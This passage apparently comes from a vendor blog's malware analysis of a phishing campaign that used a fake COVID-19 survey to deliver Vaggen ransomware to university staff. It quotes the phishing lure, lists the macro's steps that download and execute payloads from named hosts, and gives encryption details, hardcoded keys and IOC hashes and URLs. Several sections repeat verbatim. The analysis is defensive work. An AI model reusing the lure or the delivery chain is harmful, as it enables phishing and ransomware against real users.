services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2828 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2829 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2830 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2831 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2832 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2833 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2834 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2835 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2836 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2837 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2838 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2839 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2840 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2841 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2842 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2843 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2844 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2845 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2846 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2847 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2848 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2849 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2850 of 3467\n\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2851 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2852 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2853 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2854 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2855 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2856 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2857 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2858 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\n